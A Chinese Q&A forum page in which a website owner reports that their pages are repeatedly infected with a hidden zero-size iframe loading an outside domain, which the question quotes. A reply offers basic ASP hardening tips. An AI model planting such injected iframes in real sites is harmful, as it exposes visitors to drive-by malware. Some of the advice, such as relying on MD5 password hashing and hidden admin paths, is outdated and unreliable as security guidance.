求教网站安全方面的问题?

来源:百度知道 编辑:UC知道 时间:2024/06/05 01:58:57
我客户的网站网页总是被人植入<iframe src="http://74z.eqedu.net.cn/gezi.htm" width=0 height=0></iframe>,里面所有的asp、htm甚至word表格都不能幸免,类是的东西出现过很多次,有时候不是这个网址,有时候甚至四五个网址都有。
请问这个框架是什么东西???是不是病毒???该怎么处理???我的网站上有个动网的论坛,可能有漏洞,不过我升级过论坛的,打过补丁的啊!!!!

急急求助!!!!

网站安全几个方面:

论坛:不管使用什么板本的论坛(例如动网)安装上了之后,都要跟据论坛的安全设置说明进行设置.一步一步的按照安全操作进行..
网站:你的网站是ASP做的.ASP一般存在着SQL注入.要把ASP上面加上防注入代码,ASP后台地址一定要隐常的非常深,并且,网页上面不要有”后台管理”等直接链入后台的入口这样很容易被黑客找见.
防注意代码下载:http://blog.sina.com.cn/u/4a9c3b28010007k0
后台密码:后台密码是直接与数据库相通的.密码一定要使用MD5加密
加密方法及代码:http://edu.chinaz.com/Get/Program/Asp/06450636146863896.asp
网站数据库的安全:要把数据库的文件名改成*.asp 之后要把数据源加密

基本就差不多了..
给你个网站,这上面讲了很多ASP编写的注意事项,安全设置,安全代码.等等,在有不明白的,你可以在上面直接找代码...
我都写出来.百度就要装不下了,哈哈
http://edu.chinaz.com/Get/Program/Asp/index.asp